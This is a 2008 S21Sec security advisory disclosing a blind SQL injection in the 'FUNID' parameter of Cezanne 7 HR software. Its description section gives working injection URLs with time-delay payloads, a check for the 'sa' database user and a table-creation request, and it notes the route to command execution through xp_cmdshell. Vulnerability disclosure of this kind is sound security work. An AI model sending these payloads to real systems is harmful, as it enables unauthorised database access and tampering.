s21sec-43-en.txt

`##############################################################  
  
- S21Sec Advisory -  
  
##############################################################  
  
  
Title: Cezanne SW (login required) Blind SQL Injection  
ID: S21SEC-043-en  
Severity: High  
History:  
02.Jan.2008 Vulnerability discovered  
Authors:  
Juan de la Fuente Costa ([email protected])  
Fco Javier Puerta Rubio ([email protected])  
URL: http://www.s21sec.com/avisos/s21sec-43-en.txt  
  
  
[ SUMMARY ]  
  
Cezanne develops Human Capital Management Software.  
  
This Software provides leading-edge Human Capital Management solutions  
that help companies better develop, manage, reward and retain their most  
important asset - their people.  
  
Cezanne include applications for employee performance management, career &  
succession planning, training & development, people management,  
recruitment, salary analysis & compensation planning, pay review, employee  
survey and organization charting.  
  
  
[ AFFECTED VERSIONS ]  
  
This vulnerability has been tested in Cezanne 7.  
  
  
[ SCENARIO ]  
  
The test has been done in the following environment:  
  
MS Windows Server 2003 Enterprise Edition, IIS 6.0, MS SQL Server 2005  
  
  
[ DESCRIPTION ]  
  
S21sec has discovered a vulnerability in Cezanne 7 that allows injecting  
SQL code in text variables.  
This issue allows SQL code execution in the application server.  
The vulnerable param is "FUNID"  
Some examples of the exploitation:  
  
URL[ NEEDS LOGIN ]:  
https://www.somesite.es/cezanneweb/CFLookup.asp?FUNID=7302015;waitfor%20delay%20'0:0:20';--&InIFrame=1  
STRING:;waitfor%20delay%20'0:0:20';--  
  
URL[ NEEDS LOGIN ]:  
https://www.somesite.es/cezanneweb/CznCommon/CznCustomContainer.asp?FUNID=7302031;waitfor%20delay%20'0:0:05';--  
STRING:;waitfor%20delay%20'0:0:05';--  
  
To get more information about the system or create tables:  
  
If the following request, it takes a delay of ten seconds, the database  
user is not 'sa':  
  
https://www.somesite.es/cezanneweb/CznCommon/CznCustomContainer.asp?FUNID=7302031;if  
(select user) <> 'sa' waitfor delay '0:0:10';--  
  
In MS SQL Server 2005, xp_cmdshell is disable by default. But We can  
create tables with the following request:  
  
https://www.somesite.es/cezanneweb/CznCommon/CznCustomContainer.asp?FUNID=7302031;CREATE  
TABLE tabla_test_blindSQL_intrusion (clave int IDENTITY (100,1) PRIMARY  
KEY, nombre nvarchar (50));waitfor%20delay%20'0:0:10';--  
  
If xp_cmdshell is enable, It is possible execute command line instructions.  
  
  
[ WORKAROUND ]  
  
Contact with Cezanne Software at: http://www.cezannesw.com/  
  
  
[ ACKNOWLEDGMENTS ]  
  
This vulnerability has been discovered and researched by:  
- Juan de la Fuente Costa S21Sec  
- Fco Javier Puerta Rubio S21Sec  
Special thanks to Vicente Diaz Saez.  
  
You can find the last version of this warning at:  
http://www.s21sec.com/es/avisos/s21sec-043-en.txt  
  
http://www.s21sec.com  
http://blog.s21sec.com  
`